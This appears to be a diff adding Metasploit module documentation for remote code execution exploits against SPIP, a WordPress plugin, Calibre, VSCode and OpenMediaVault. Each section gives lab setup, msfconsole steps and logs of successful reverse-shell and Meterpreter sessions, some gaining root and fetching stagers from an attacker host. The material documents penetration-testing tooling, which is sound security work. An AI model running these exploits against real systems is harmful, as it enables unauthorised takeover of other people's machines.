+      - SPIP_DB_NAME=spip
+      - SPIP_AUTO_INSTALL=1
+    ports:
+      - 8880:80
+    volumes:
+      - spip-data:/var/www/html
+
+volumes:
+  spip-data:
+  mysql-data:
+```
+
+This Docker Compose file configures a SPIP environment with a MariaDB backend, enabling automatic installation.
+Here are the correct setup details:
+
+- **SPIP Access URL:** `http://localhost:8880`
+- **Database Configuration:** Utilizes MariaDB, as specified by the database service setup.
+- **Automatic Installation:** Enabled via `SPIP_AUTO_INSTALL=1`.
+
+After launching the Docker container, SPIP will be accessible at `http://localhost:8880`.
+The automatic installation will simplify the initial setup, allowing you to start using SPIP without manual configuration.
+
+If you decide to disable automatic installation by setting `SPIP_AUTO_INSTALL` to `0`, you will need to manually configure SPIP.
+To do this, after starting the container, navigate to `http://localhost:8880/ecrire` to access the SPIP web installation panel.
+
+### Non-Docker Setup
+
+If you prefer not to use Docker, you can manually set up SPIP with the following commands:
+
+```bash
+wget https://files.spip.net/spip/archives/spip-v4.2.12.zip
+unzip spip-v4.2.12.zip
+cd spip-v4.2.12
+php -S 0.0.0.0:8000
+```
+
+Accessible at `http://localhost:8000`.
+
+## Verification Steps
+
+1. Set up a SPIP instance with the specified Docker environment.
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/spip_porte_plume_previsu_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+No additional options are required for basic exploitation.
+
+## Scenarios
+
+### Successful Exploitation Against Local SPIP 4.2.12
+
+**Setup**:
+
+- Local SPIP instance with version 4.2.12.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/spip_porte_plume_previsu_rce
+```
+3. Set `RHOSTS` to the local IP (e.g., 127.0.0.1).
+4. Configure other necessary options (TARGETURI, SSL, etc.).
+5. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.12
+[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
+[*] Preparing to send exploit payload to the target...
+[*] Sending exploit payload to the target...
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:56534) at 2024-08-19 19:43:18 +0200
+
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.12
+[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
+[*] Preparing to send exploit payload to the target...
+[*] Sending exploit payload to the target...
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.36:59106) at 2024-08-19 19:44:40 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.
+
+**Note**: Ensure the SPIP instance is correctly configured and running in the Docker environment for the exploit to work as expected.
@@ -0,0 +1,196 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in WordPress Hash Form
+plugin, versions prior to 1.1.1.
+The vulnerability is due to an unauthenticated file upload flaw in the plugin.
+To replicate a vulnerable environment for testing:
+
+1. Install WordPress.
+2. Download and install the Hash Form plugin, ensuring the version is below 1.1.1.
+3. Verify that the plugin is activated and accessible on the local network.
+4. Create any form
+
+## Verification Steps
+
+1. Set up a WordPress instance with the Hash Form plugin (version < 1.1.1).
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/wp_hash_form_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+No option
+
+## Scenarios
+
+### Successful Exploitation Against Local WordPress with Hash Form 1.10
+
+**Setup**:
+
+- Local WordPress instance with Hash Form version 1.1.0.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/wp_hash_form_rce
+```
+3. Set `RHOSTS` to the local IP (e.g., 192.168.1.11).
+4. Configure other necessary options (TARGETURI, SSL, etc.).
+5. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`
+
+```
+msf6 > search wp_hash_form_rce
+
+Matching Modules
+================
+
+   #  Name                                   Disclosure Date  Rank       Check  Description
+   -  ----                                   ---------------  ----       -----  -----------
+   0  exploit/multi/http/wp_hash_form_rce    2024-05-23       excellent  Yes    WordPress Hash Form Plugin RCE
+   1    \_ target: Automatic                 .                .          .      .
+   2    \_ target: PHP In-Memory             .                .          .      .
+   3    \_ target: Unix/Linux Command Shell  .                .          .      .
+   4    \_ target: Windows Command Shell     .                .          .      .
+
+
+Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_hash_form_rce
+After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'
+
+msf6 > use 0
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_hash_form_rce) > options
+
+Module options (exploit/multi/http/wp_hash_form_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_hash_form_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(multi/http/wp_hash_form_rce) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/wp_hash_form_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Detected Hash Form plugin version: 1.1.0
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce from the target...
+[+] Nonce retrieved: c037ee0b47
+[*] Uploading PHP payload using the retrieved nonce...
+[+] PHP payload uploaded successfully to http://localhost:8080/wp-content/uploads/hashform/temp/zumchnzt.php
+[*] Triggering the payload at http://localhost:8080/wp-content/uploads/hashform/temp/zumchnzt.php...
+[*] Sending stage (39927 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.20.0.3:52596) at 2024-05-28 17:52:51 +0200
+
+meterpreter > sysinfo 
+Computer    : 92b664be9b0c
+OS          : Linux 92b664be9b0c 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/wp_hash_form_rce) > options
+
+Module options (exploit/multi/http/wp_hash_form_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      KtElgOyozC       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       5555             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Unix/Linux Command Shell
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_hash_form_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Detected Hash Form plugin version: 1.1.0
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce from the target...
+[+] Nonce retrieved: c037ee0b47
+[*] Uploading PHP payload using the retrieved nonce...
+[+] PHP payload uploaded successfully to http://localhost:8080/wp-content/uploads/hashform/temp/roeylnhj.php
+[*] Triggering the payload at http://localhost:8080/wp-content/uploads/hashform/temp/roeylnhj.php...
+[*] Sending stage (3045380 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.20.0.3:53478) at 2024-05-28 18:03:35 +0200
+
+meterpreter > sysinfo
+Computer     : 172.20.0.3
+OS           : Debian 12.5 (Linux 5.15.0-91-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+- The module attempts to retrieve a nonce from the local server.
+- It then uploads and executes the payload.
+- If successful, control over the local WordPress instance is gained, depending on the payload used.
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a vulnerability in Calibre <= v6.9.0 - v7.15.0 (CVE-2024-6782).
+
+An unauthenticated remote attacker can exploit this vulnerability to gain arbitrary code execution in the context of which Calibre is being
+executed.
+
+All versions between v6.9.0 - v7.15.0 are affected. STAR Labs published [an advisory](https://starlabs.sg/advisories/24/24-6782/) that
+includes the root cause analysis and a proof-of-concept.
+
+**Vulnerable Application Installation**
+
+Calibre can be downloaded from [here](https://download.calibre-ebook.com/).
+
+**Successfully tested on**
+
+Windows:
+- Calibre v7.15 on Windows 10 22H2
+- Calibre v7.14 on Windows 10 22H2
+- Calibre v7.0 on Windows 10 22H2
+- Calibre v6.29 on Windows 10 22H2
+- Calibre v6.9 on Windows 10 22H2
+
+Linux:
+- Calibre v7.15 on Ubuntu 24.04 LTS
+- Calibre v7.14 on Ubuntu 24.04 LTS
+- Calibre v7.0 on Ubuntu 24.04 LTS
+- Calibre v6.29 on Ubuntu 24.04 LTS
+- Calibre v6.9 on Ubuntu 24.04 LTS
+
+## Verification Steps
+
+1. Install Calibre
+2. Start Calibre and click Connect/share > Start Content server
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/multi/misc/calibre_exec
+[*] Using configured payload cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/misc/calibre_exec) > set RHOSTS <IP>
+msf6 exploit(multi/misc/calibre_exec) > set LHOST <IP>
+msf6 exploit(multi/misc/calibre_exec) > exploit
+```
+
+You should get a meterpreter session running in the same context as the Calibre application.
+
+## Scenarios
+
+**Windows**
+
+Running the exploit against Calibre v7.14 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
+following:
+
+```
+msf6 exploit(multi/misc/calibre_exec) > exploit 
+
+[*] Started reverse TCP handler on 192.168.137.190:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending payload...
+[*] Sending stage (201798 bytes) to 192.168.137.194
+[*] Meterpreter session 1 opened (192.168.137.190:4444 -> 192.168.137.194:50346) at 2024-08-01 23:28:16 -0400
+[*] Exploit finished, check thy shell.
+
+meterpreter > sysinfo
+Computer        : DESKTOP-foo
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+
+meterpreter > shell
+Process 6084 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4529]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Program Files\Calibre2>whoami
+whoami
+desktop-foo\admin
+```
+
+**Linux**
+
+Running the exploit against Calibre v7.14 on Ubuntu 24.04 LTS, using cmd/unix/python/meterpreter/reverse_tcp as a payload, should result in
+an output similar to the following:
+
+```
+msf6 exploit(multi/misc/calibre_exec) > exploit 
+
+[ *] Started reverse TCP handler on 192.168.137.190:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending payload...
+[*] Sending stage (24772 bytes) to 192.168.137.195
+[*] Meterpreter session 2 opened (192.168.137.190:4444 -> 192.168.137.195:52376) at 2024-08-01 23:40:16 -0400
+
+meterpreter > sysinfo
+Computer        : asdfvm
+OS              : Linux 6.8.0-39-generic #39-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul  5 21:49:14 UTC 2024
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+```
@@ -0,0 +1,148 @@
+## Vulnerable Application
+
+VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.
+On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed
+HTML and javascript, which can then open new terminal windows within VSCode.
+Each of these new windows can then execute arbitrary code at startup.
+
+During testing, the first open of the Jupyter notebook resulted in pop-ups
+displaying errors of unable to find the payload exe file. The second attempt
+at opening the Jupyter notebook would result in successful execution.
+
+Successfully tested against VSCode 1.70.2 on Windows 10 and Ubuntu 22.04.
+
+### Install
+
+From https://code.visualstudio.com/updates/v1_70
+
+https://update.code.visualstudio.com/1.70.2/win32-x64-user/stable
+
+https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable
+
+
+## Verification Steps
+
+### Windows
+1. Install the application
+1. Start msfconsole
+1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
+1. Do: `set lhost [ip]`
+1. Do: `run`
+1. In VSCode, open the URL (File -> Open -> Paste/type the URL)
+1. After the pop-up errors, open the file again.
+1. You should get a shell.
+
+### Linux
+1. Install the application
+1. Start msfconsole
+1. Do: `use linux/x64/meterpreter/reverse_tcp`
+1. Do: `set lhost [ip]` and `set lport [port]`
+1. Do: `generate -o shell.sh -f elf`
+1. Copy the payload `shell.sh` to `/tmp/` on the target and run `chmod +x /tmp/shell.sh`
+1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
+1. Do: `set target 1 `
+1. Do: `set lhost [ip]` and `set lport [port]` - be sure to set these to the same values as in the previous step
+1. Do: `set FETCH_WRITABLE_DIR /tmp/`
+1. Do: `set PAYLOAD_FILENAME shell.sh`
+1. Do: `run`
+1. Copy the ipynb, and payload file to the target machine.
+1. In VSCode, open the file (File -> Open -> project.ipynb)
+1. After the pop-up errors, open the file again.
+1. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### VSCode 1.70.2 on Windows 10
+
+```
+resource (ipynb)> use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+resource (ipynb)> set fetch_srvport 9090
+fetch_srvport => 9090
+resource (ipynb)> rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.10.147:4444 
+[*] Starting up web service...
+[*] Using URL: http://192.168.10.147:8080/project.ipynb
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+
+
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sending stage (201798 bytes) to 192.168.10.100
+[*] Sending stage (201798 bytes) to 192.168.10.100
+[*] Meterpreter session 1 opened (192.168.10.147:4444 -> 192.168.10.100:56964) at 2024-03-21 12:38:13 +0000
+[*] Meterpreter session 2 opened (192.168.10.147:4444 -> 192.168.10.100:56967) at 2024-03-21 12:38:14 +0000
+^C[-] Exploit failed [user-interrupt]: Interrupt 
+[*] Server stopped.
+[-] rexploit: Interrupted
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-Q0HUOEI
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 4
+Meterpreter     : x64/windows
+meterpreter > shell
+Process 9632 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4170]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Users\h00die>code --version
+code --version
+1.70.2
+e4503b30fc78200f846c62cf8091b76ff5547662
+x64
+
+C:\Users\h00die>
+```
+
+### VSCode 1.70.2 on Linux
+
+```
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Starting up web service...
+[*] Using URL: http://172.16.199.1:8090/project.ipynb
+[*] Sent project.ipynb to 172.16.199.131
+[*] Sending stage (3045380 bytes) to 172.16.199.131
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:60298) at 2024-05-13 09:56:36 -0700
+
+^C[-] Exploit failed [user-interrupt]: Interrupt
+[*] Server stopped.
+[-] run: Interrupted
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information               Connection
+  --  ----  ----                   -----------               ----------
+  3         meterpreter x64/linux  msfuser @ 172.16.199.131  172.16.199.1:4444 -> 172.16.199.131:60298 (172.16.199
+
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: msfuser
+meterpreter > sysinfo
+Computer     : 172.16.199.131
+OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,281 @@
+## Vulnerable Application
+
+This is a new module addressing an old vulnerability in OpenMediaVault, an open-source NAS solution.
+The vulnerability exists within all OpenMediaVault versions starting from from `0.1` until the recent release `7.4.2-2`
+and it allows an authenticated user to create cron jobs as root on the system.
+An attacker can abuse this by sending a POST request via `rpc.php` to schedule and execute a cron entry
+that runs arbitrary commands as root on the system.
+
+The following releases were tested.
+
+**OpenMediaVault x64 appliances:**
+* openmediavault_0.2_amd64.iso
+* openmediavault_0.2.5_amd64.iso
+* openmediavault_0.3_amd64.iso
+* openmediavault_0.4_amd64.iso
+* openmediavault_0.4.32_amd64.iso
+* openmediavault_0.5.0.24_amd64.iso
+* openmediavault_0.5.48_amd64.iso
+* openmediavault_1.9_amd64.iso
+* openmediavault_2.0.13_amd64.iso
+* openmediavault_2.1_amd64.iso
+* openmediavault_3.0.2-amd64.iso
+* openmediavault_3.0.26-amd64.iso
+* openmediavault_3.0.74-amd64.iso
+* openmediavault_4.0.9-amd64.iso
+* openmediavault_4.1.3-amd64.iso
+* openmediavault_5.0.5-amd64.iso
+* openmediavault_5.5.11-amd64.iso
+* openmediavault_5.6.13-amd64.iso
+* openmediavault_6.0-16-amd64.iso
+* openmediavault_6.0-34-amd64.iso
+* openmediavault_6.0-amd64.iso
+* openmediavault_6.0.24-amd64.iso
+* openmediavault_6.5.0-amd64.iso
+* openmediavault_7.0-20-amd64.iso
+* openmediavault_7.0-32-amd64.iso
+
+**ARM64 on Raspberry PI running Kali Linux 2024-3:**
+* openmediavault 7.3.0-5
+* openmediavault 7.4.2-2
+
+**VirtualBox Images (x64):**
+* openmediavault 0.4.24
+* openmediavault 0.5.30
+* openmediavault 1.0.21
+
+## Installation steps to install OpenMediaVault NAS appliance
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download the OpenMediaVault iso images from [here](https://sourceforge.net/projects/openmediavault/files/iso/).
+* Install the iso image in your virtualization engine.
+* When installed, configure the VM appliance to your needs using the menu options.
+* Boot up the VM and should be able to access the OpenMediaVault appliance.
+* Either thru the console, `ssh` on port `22` or using the `webui` via `http://your_openmediavault_ip`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/unix/webapp/openmediavault_auth_cron_rce`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+
+### USERNAME
+This option is required and is the username (default: admin) to authenticate with the application.
+
+### PASSWORD
+This option is required and is the password (default: openmediavault) in plain text to authenticate with the application.
+
+### PERSISTENT
+This option keeps the payload persistent in Cron and runs every minute. Warning: This is a noisy option for detection.
+The default value is false, where the payload is removed to cover your tracks.
+
+## Scenarios
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > info
+
+       Name: OpenMediaVault rpc.php Authenticated Cron Remote Code Execution
+     Module: exploit/unix/webapp/openmediavault_auth_cron_rce
+   Platform: Unix, Linux
+       Arch: cmd, x86, x64, armle, aarch64
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-05-08
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Brandon Perry <bperry.volatile@gmail.com>
+  Mert BENADAM
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix Command
+      1   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  PASSWORD   openmediavault   yes       The OpenMediaVault password to authenticate with
+  PERSISTENT  false           yes       Keep the payload persistent in Cron. Default value is false, where the payload is removed
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The URI path of the OpenMediaVault web application
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  USERNAME   admin            yes       The OpenMediaVault username to authenticate with
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
+                                      n on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  OpenMediaVault allows an authenticated user to create cron jobs as root on the system.
+  An attacker can abuse this by sending a POST request via rpc.php to schedule and execute
+  a cron entry that runs arbitrary commands as root on the system.
+  All OpenMediaVault versions including the latest release 7.3.1-1 are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2013-3632
+  https://packetstormsecurity.com/files/178526
+  https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632
+
+
+View the full module info with the info -d command.
+```
+### openmediavault_7.0-32-amd64.iso appliance Unix command - cmd/unix/reverse_bash
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > check
+
+[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] 192.168.201.6:80 - The target is vulnerable. Version 7.0.pre.32
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] The target is vulnerable. Version 7.0.pre.32
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
+[+] Cron payload entry successfully removed.
+[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.6:60814) at 2024-07-03 12:47:54 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
+exit
+```
+### openmediavault_7.0-32-amd64.iso appliance Linux Dropper -  linux/x64/meterpreter/reverse_tcp
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 1
+target => 1
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] The target is vulnerable. Version 7.0.pre.32
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/cYSPpwJI3FXafxL
+[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Client 192.168.201.6 (Wget/1.21.3) requested /cYSPpwJI3FXafxL
+[*] Sending payload to 192.168.201.6 (Wget/1.21.3)
+[*] Sending stage (3045380 bytes) to 192.168.201.6
+[+] Cron payload entry successfully removed.
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.6:44398) at 2024-07-03 12:53:49 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : openmediavault.local
+OS           : Debian 12.5 (Linux 6.1.0-18-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+###  openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Unix command - cmd/unix/reverse_bash
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 0
+target => 0
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
+rhosts => 192.168.1.10
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
+lhost => 192.168.1.8
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] The target appears to be vulnerable. Version 7.3.0.pre.5
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
+[+] Cron payload entry successfully removed.
+[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-01 20:14:07 +0000
+
+pwd
+/root
+uname -a
+Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
+```
+###  openmediavault 7.3.0-5 ARM64 Raspberry PI-4  Linux Dropper -  linux/aarch64/meterpreter_reverse_tcp
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 1
+target => 1
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
+rhosts => 192.168.1.10
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
+lhost => 192.168.1.8
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
